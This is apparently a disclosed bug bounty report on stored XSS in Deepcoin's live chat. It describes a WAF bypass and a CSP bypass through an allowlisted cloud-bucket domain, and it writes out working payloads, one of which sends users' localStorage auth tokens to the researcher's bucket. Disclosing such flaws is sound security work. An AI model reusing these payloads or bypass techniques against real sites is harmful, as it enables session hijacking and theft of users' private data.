'%3e%3cpath%20d='M12.4997%201.33325C10.39%201.33325%208.32772%201.95884%206.5736%203.13091C4.81947%204.30298%203.4523%205.96888%202.64496%207.91796C1.83763%209.86704%201.62639%2012.0118%202.03797%2014.0809C2.44955%2016.15%203.46545%2018.0506%204.95721%2019.5424C6.44897%2021.0342%208.34959%2022.0501%2010.4187%2022.4616C12.4878%2022.8732%2014.6326%2022.662%2016.5816%2021.8546C18.5307%2021.0473%2020.1966%2019.6801%2021.3687%2017.926C22.5408%2016.1719%2023.1663%2014.1096%2023.1663%2011.9999C23.1663%209.17094%2022.0425%206.45783%2020.0422%204.45745C18.0418%202.45706%2015.3287%201.33325%2012.4997%201.33325ZM12.4997%2021.3333C10.6537%2021.3333%208.84922%2020.7859%207.31436%2019.7603C5.7795%2018.7347%204.58322%2017.2771%203.8768%2015.5716C3.17039%2013.8662%202.98555%2011.9896%203.34568%2010.1791C3.70581%208.36859%204.59473%206.70554%205.90002%205.40025C7.20531%204.09496%208.86835%203.20605%2010.6788%202.84592C12.4893%202.48579%2014.3659%202.67063%2016.0714%203.37704C17.7768%204.08346%2019.2345%205.27974%2020.2601%206.8146C21.2856%208.34945%2021.833%2010.154%2021.833%2011.9999C21.833%2014.4753%2020.8497%2016.8492%2019.0993%2018.5996C17.349%2020.3499%2014.975%2021.3333%2012.4997%2021.3333Z'%20fill='white'/%3e%3cpath%20d='M19.167%208.06667C19.042%207.9425%2018.8731%207.8728%2018.697%207.8728C18.5208%207.8728%2018.3519%207.9425%2018.227%208.06667L10.8269%2015.4333L6.82695%2011.4333C6.70495%2011.3016%206.53562%2011.2237%206.35621%2011.2169C6.1768%2011.21%206.00201%2011.2747%205.87028%2011.3967C5.73856%2011.5187%205.66069%2011.688%205.65382%2011.8674C5.64694%2012.0468%205.71162%2012.2216%205.83362%2012.3533L10.8269%2017.3333L19.167%209.01333C19.2294%208.95136%2019.279%208.87762%2019.3129%208.79638C19.3467%208.71514%2019.3642%208.62801%2019.3642%208.54C19.3642%208.45199%2019.3467%208.36485%2019.3129%208.28361C19.279%208.20237%2019.2294%208.12864%2019.167%208.06667Z'%20fill='white'/%3e%3c/g%3e%3cdefs%3e%3cclipPath%20id='clip0_2790_31187'%3e%3crect%20width='24'%20height='24'%20fill='white'%20transform='translate(0.5)'/%3e%3c/clipPath%3e%3c/defs%3e%3c/svg%3e)
Deepcoin Disclosed Report
Bug bounty report Deepcoin Web & MobileStored XSS + WAF Bypass + CSP Bypass -> leads to Auth token and private data leakage
Target
https://www.deepcoin.com/
Vulnerability Details
During testing Chat Rooms functionality, I've discovered that it's still possible to inject malicious payloads by crafting special exploit combined with encoding and loading scripts from the third-party resources meaning that Deepcoin users are still under a big risk being hacked with malicious users.
To start with, I've discovered that your custom WAF solution may be easily bypassed by manipulating with letters case and encoding some of the blacklisted parameters to the ASCII encode. Keeping this in mind, I crafted the payload will completely bypasses WAF blacklisting and allowing to alert the Auth token from the localStorage. Here's an example of working payload:
<form><button formaction=jAvasCript:alert(localStorage.getItem('token'))>click
After I discovered of how the WAF can be bypassed, I've started CSP header analysis and after some period of time, I've discovered that CSP is vulnerable and can be easily bypassed by setting up S3 buckets on the following resources:
- *.oss-accelerate.aliyuncs.com
- *.s3.ap-northeast-1.amazonaws.com
- *.s3.ap-southeast-1.amazonaws.com
After that, I've created a custom S3 bucket service on the Germany (Frankfurt) region with enabled "Transfer Acceleration", which allowed to make my instance accessible on the *.oss-accelerate.aliyuncs.com domain, which is excluded in the CSP header, allowing me to load my custom scripts and images to the Deepcoin application.
Then, I've hosted and HTML file containing <h1>Hello</h1> and set it up as a static page which will be loading by requesting my instance located on dasdasdads.oss-accelerate.aliyuncs.com subdomain. This allowed me to collect access log of the file I host on my custom bucket. Keeping this in mind, I crafted a special payload with <img> HTML tag, which constantly trying to load an image to the Deepcoin Live Chat Room and appending the localStorage token object to the GET request as URI parameter. The following payloads bypasses your custom WAF solution and implemented CSP security measure by hosting my app on the trusted domain:
"><iMg sRc=x oNerRor=this.src='https://dasdasdads.oss-accelerate.aliyuncs.com/?'+JSON.stringify(localStorage.getItem('token'));>
Finally, after the payload was crafted, debuged, and the logging was turned on my Bucket instance, I've successfully injected it to the the Deepcoin Live Chat Room.
As you can see, It started generating massive amount of requests to my resource containing the Auth token from the local storage:
After that, all I had to do is just exfiltrate the Auth token from my buckets access log:
As you can see from the attached screenshot, Auth tokens were successfully attached to the request and logged by my Bucket service, and can be checked after the /?%22 URI value. Here's the part of the log I've collected containing about 50.000 lines.
Besides that, with this attack it's possible to exfiltrate not only Auth tokens, but also private information like users IP, emails, phone numbers, country, UID and much more as it all contains in the localStorage.
To prove the severity of this issue, I'm providing a screenshot from the Deepcoin API endpoint where the retrieved token used as the Authentication header, meaning that all the retrieved tokens may be reused as according to my investigation, the session stays alive for several days.
To finalize my report, all the Deepcoin users which visit Deepcoin Live chat room are affected to this vulnerability, as all their data can be easily stolen without any interaction, all they need to do is load the chat room page.
Validation steps
All required steps are described in the part below.
Comments on this report are hidden 
Details 
Participants (3) 
